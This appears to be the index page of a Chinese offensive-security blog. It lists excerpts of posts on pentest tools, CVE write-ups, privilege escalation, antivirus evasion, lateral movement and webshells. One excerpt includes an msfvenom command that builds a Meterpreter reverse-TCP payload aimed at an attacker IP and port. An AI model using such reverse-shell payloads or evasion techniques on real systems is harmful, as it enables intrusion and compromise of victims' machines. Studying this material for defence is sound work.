互动
最近评论
A1
stonewu
感谢博主,崩溃转储文件的堆栈跟踪得到的反汇编看到是内存读写,可否贴以下导致崩溃那个地址前的反汇编代码呀,可以验证是否是申请一个结构体/对象的返回地址。
标签
寻找感兴趣的领域
文章

狼目安全

LMTEAM
谢谢你的关注
更多信息请关注 GitHub
必看
热门
必看
热门
渗透辅助工具 密探
网络安全 未读
渗透辅助工具 密探
密探是一款渗透测试辅助工具,主要包含域名信息查询,IP端口查询,备案信息查询,搜索引擎语法自动生成(FOFA,Hunter,google,github),资产测绘(FOFA,hunter,quake 的查询及结果导出),指纹识别、敏感信息(暴露接口并可以
工具
idc后渗透 ssh 批量命令执行工具
网络安全 未读
idc后渗透 ssh 批量命令执行工具
工具已发送github 工具链接地址:https://github.com/lmaqbailan/Wolf-eyed-safety/releases/tag/ssh 文章链接地址:https://github.com/lmaqbailan/Wolf-eyed-safety/tree/ssh 介绍:
工具 技术分享
Windows 上的 Unicode 到 ASCII 转换可能导致参数注入等
网络安全 未读
Windows 上的 Unicode 到 ASCII 转换可能导致参数注入等
我是 DEVCORE 研究团队的 splitline。我们最近在 cURL 上发现了一个漏洞。我们在最新版本的 cURL(curl-8.8.0_1)中重现了这些问题,并想向您报告。请查看附件文档了解详细信息。 此通告符合我们的漏洞披露政策,该政策将在 90 天后公开披露。我们的目标是确保漏洞能够及时
技术分享 二进制安全
CVE-2024-31982:XWiki 通过 DatabaseSearch 以访客身份远程执行代码
漏洞 未读
CVE-2024-31982:XWiki 通过 DatabaseSearch 以访客身份远程执行代码
影响 XWiki 的数据库搜索允许通过搜索文本执行远程代码。由于数据库搜索默认可供所有用户访问,因此任何公共 wiki 访问者或封闭 wiki 用户都可以执行远程代码。这会影响整个 XWiki 装置的机密性、完整性和可用性。 要在未登录的情况下重现实例,请转到
漏洞
GrimResource - 用于初始访问和规避的 Microsoft 管理控制台
网络安全 未读
GrimResource - 用于初始访问和规避的 Microsoft 管理控制台
概述 在微软默认禁用互联网文档的 Office 宏后,JavaScript、MSI 文件、LNK 对象和 ISO 等其他感染媒介的流行度激增。然而,这些其他技术受到防御者的严格审查,被发现的可能性很高。成熟的攻击者试图利用新的和未公开的感染媒介来获取访问权限,同时逃避防御。最近的一个例子是朝鲜参与者
技术分享 网安前沿时报
应对隐秘的 WMI 横向移动
网络安全 未读
应对隐秘的 WMI 横向移动
介绍 在本文中,我们将介绍一个使用 Windows 管理规范 (WMI) 远程控制目标计算机的 Python 脚本。该脚本利用 COM 与 WMI 基础架构进行通信并执行管理任务。 使用不同的类,我们将探索执行 shell 命令的不同方法,并观察每种方法在后台的工作方式以及它们在事件查看器中的
渗透测试提权 技术分享
云横向移动:通过易受攻击的容器进行入侵
网络安全 未读
云横向移动:通过易受攻击的容器进行入侵
横向移动是云安全日益令人担忧的问题。也就是说,一旦您的云基础设施的一部分受到威胁,攻击者可以攻击多远? 在针对云环境的著名攻击中,经常发生的情况是,一个公开可用的易受攻击的应用程序可以作为入口点。从那里,攻击者可以尝试进入云环境,试图窃取敏感数据或使用该帐户来达到自己的目的,例如加密货币挖掘。 在本
渗透测试提权 技术分享
JDBC反序列化漏洞
漏洞 未读
JDBC反序列化漏洞
Java JDBC JDBC简介 JDBC(Java Database Connectivity)是Java提供对数据库进行连接、操作的标准API。Java自身并不会去实现对数据库的连接、查询、更新等操作而是通过抽象出数据库操作的A
漏洞 反序列化
正则表达式笔记
团队笔记 未读
正则表达式笔记
1. 起篇 正则表达式(Regular Expression,通常简称为regex或regexp)是处理字符串的强大工具,它提供了一种灵活的方式来搜索、匹配和操作文本。由于其强大的功能和在文本处理中的普遍应用,正则表达式成为了每个程序员和数据科学家必备的技能之一。 正则表达式的概念
团队笔记
PHP安全介绍-JS前端逻辑类
网络安全 未读
PHP安全介绍-JS前端逻辑类
JS前端验证-文件上传 自写一个js语言的文件上传功能 访问网站上传一个php文件发现有js前端白名单验证不允许上传 因为js代码是在浏览器运行的,所以可以在浏览器禁用js运行。js验证代码无法执行,就可以上传任意文件了 禁用js 火狐浏览器搜索about:config 进入页面再次搜索javasc
技术分享
PHP特性-缺陷对比函数
网络安全 未读
PHP特性-缺陷对比函数
php过滤函数缺陷绕过 和=的缺陷绕过 =:赋值 ==:对比值不对比值类型 ===:对比值也对比值类型 举个例子:==的时候访问文件
技术分享
权限提升-数据库提权-MSF-UDF提权
网络安全 未读
权限提升-数据库提权-MSF-UDF提权
权限提升基础信息 1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入
渗透测试提权
权限提升-Windows提权-UAC提权之MSF模块和UACME项目+DLL劫持+不带引号服务路径+不安全的服务权限
网络安全 未读
权限提升-Windows提权-UAC提权之MSF模块和UACME项目+DLL劫持+不带引号服务路径+不安全的服务权限
权限提升基础信息 1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入
渗透测试提权 技术分享 网络安全威胁情报
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
网络安全 未读
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
C/C++ --ShellCode-免杀对抗 介绍: shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。
渗透测试提权 技术分享
免杀对抗-C+go语言-混淆+防反编译+分离
网络安全 未读
免杀对抗-C+go语言-混淆+防反编译+分离
C#&NET-ShellCode-生成/上线 一、生成: 1.msf生成C#语言的shellcode 命令:msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.206.192 LPORT=4444 -e x86/shikata_g
技术分享 二进制安全
你好啊!我是
狼目安全
文章数 :
367
访问量 :
27135
建站天数 :
2023-08-05
最新评论
最近发布
【反诈专题】防范于心,防诈于行——防诈骗安全知识宣传
【反诈专题】防范于心,防诈于行——防诈骗安全知识宣传
Windows中redis未授权通过dll劫持上线
Windows中redis未授权通过dll劫持上线
若依前后端分离下的渗透测试
若依前后端分离下的渗透测试
针对Swagger的另类"绕过"
针对Swagger的另类"绕过"
哥斯拉代码分析
哥斯拉代码分析
通过 SSTI 在 Spring Boot 错误页面上使用 Akamai WAF 绕过进行 RCE
通过 SSTI 在 Spring Boot 错误页面上使用 Akamai WAF 绕过进行 RCE
利用 PUT 方法导致三星远程代码执行 (RCE)
利用 PUT 方法导致三星远程代码执行 (RCE)
使用 Microsoft Entra 临时访问通行证进行横向移动和本地 NT 哈希转储
使用 Microsoft Entra 临时访问通行证进行横向移动和本地 NT 哈希转储
利用 N-day 漏洞攻击所有网站 - Chrome 渲染器 RCE
利用 N-day 漏洞攻击所有网站 - Chrome 渲染器 RCE
Apache ActiveMQ 漏洞导致隐秘 哥斯拉 Webshel​​l
Apache ActiveMQ 漏洞导致隐秘 哥斯拉 Webshel​​l
引用到评论
随便逛逛 博客分类 文章标签